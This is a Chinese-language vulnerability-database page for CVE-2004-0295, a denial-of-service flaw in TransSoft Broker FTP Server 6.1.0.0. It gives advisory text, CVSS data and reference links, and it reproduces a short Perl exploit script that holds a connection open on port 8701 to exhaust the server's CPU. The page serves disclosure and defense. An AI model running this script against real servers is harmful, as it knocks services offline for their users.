CVE-2004-0295
CVSS5.0
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:43:22
NMCOES    

[原文]TsFtpSrv.exe in Broker FTP 6.1.0.0 allows remote attackers to cause a denial of service (CPU consumption) via an open idle connection.


[CNNVD]TransSoft Broker FTP Server远程拒绝服务攻击漏洞(CNNVD-200411-103)

        
        Broker FTP是一款FTP服务程序。
        Broker FTP对部分不正常连接缺少正确处理,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        通过连接FTP服务程序的消息服务程序(默认8701口)然后马上断开,可导致TsFtpSrv.exe程序发生异常。
        另外通过连接服务程序,不发送任何数据,但保持连接打开,就可以使TsFtpSrv.exe消耗大量CPU时间,而造成拒绝服务。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0295
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0295
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-103
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107705346817241&w=2
(UNKNOWN)  BUGTRAQ  20040217 Broker FTP DoS (Message Server)
http://www.securiteam.com/windowsntfocus/5IP0B0AC1I.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/5IP0B0AC1I.html
http://www.securityfocus.com/bid/9680
(VENDOR_ADVISORY)  BID  9680
http://xforce.iss.net/xforce/xfdb/15242
(VENDOR_ADVISORY)  XF  broker-ftp-tsftpsrv-dos(15242)

- 漏洞信息

TransSoft Broker FTP Server远程拒绝服务攻击漏洞
中危 其他
2004-11-23 00:00:00 2005-10-20 00:00:00
远程  
        
        Broker FTP是一款FTP服务程序。
        Broker FTP对部分不正常连接缺少正确处理,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        通过连接FTP服务程序的消息服务程序(默认8701口)然后马上断开,可导致TsFtpSrv.exe程序发生异常。
        另外通过连接服务程序,不发送任何数据,但保持连接打开,就可以使TsFtpSrv.exe消耗大量CPU时间,而造成拒绝服务。
        

- 公告与补丁

        厂商补丁:
        TransSoft
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.ftp-broker.com

- 漏洞信息 (23715)

TransSoft Broker FTP Server 6.1 Denial of Service Vulnerabilities (EDBID:23715)
windows dos
2004-02-17 Verified
0 SecuriTeam
N/A [点击下载]
source: http://www.securityfocus.com/bid/9680/info

It has been reported that Broker FTP Server may be prone to multiple denial of service vulnerabilities. These issues may allow a remote attacker to cause the software to crash or hang.

Broker FTP Server version 6.1.0.0 has been reported to be prone to these issues, however, other versions may be affected as well.

#!/usr/bin/perl -w
# TransSoft Broker FTP Server DoS (CPU usage and Exception)
#

use Socket;
if (not $ARGV[0]) {
? ? ? ? print qq~
? ? ? ? ? ? ? ? Usage: pfdos.pl < host>
? ? ? ? ~;
exit;}

$ip=$ARGV[0];
print "host: " . $ip . "\n\n";
sendexplt("A");
sub sendexplt {
?my ($pstr)=@_;
? ? ? ? $target= inet_aton($ip) || die("inet_aton
problems");
?socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
?die("Socket problems\n");
?if(connect(S,pack "SnA4x8",2,8701,$target)){
?select(S);
? ? ? ? ? ? ? ? $|=1;
?print $pstr;
?sleep 100;
? ? ? ? ?close(S);
?} else { die("Can't connect...\n"); }
}
		

- 漏洞信息

3983
Broker FTP TsFtpSrv.exe Idle Connection Consumption DoS
Denial of Service
Loss of Availability

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-02-17 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

TransSoft Broker FTP Server Denial of Service Vulnerabilities
Failure to Handle Exceptional Conditions 9680
Yes No
2004-02-17 12:00:00 2009-07-12 03:06:00
The disclosure of these issues has been credited to Beyond Security's SecurITeam <expert@securiteam.com>.

- 受影响的程序版本

TransSoft Broker FTP Server 6.1 .0.0

- 漏洞讨论

It has been reported that Broker FTP Server may be prone to multiple denial of service vulnerabilities. These issues may allow a remote attacker to cause the software to crash or hang.

Broker FTP Server version 6.1.0.0 has been reported to be prone to these issues, however, other versions may be affected as well.

- 漏洞利用

The following exploit code has been provided:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站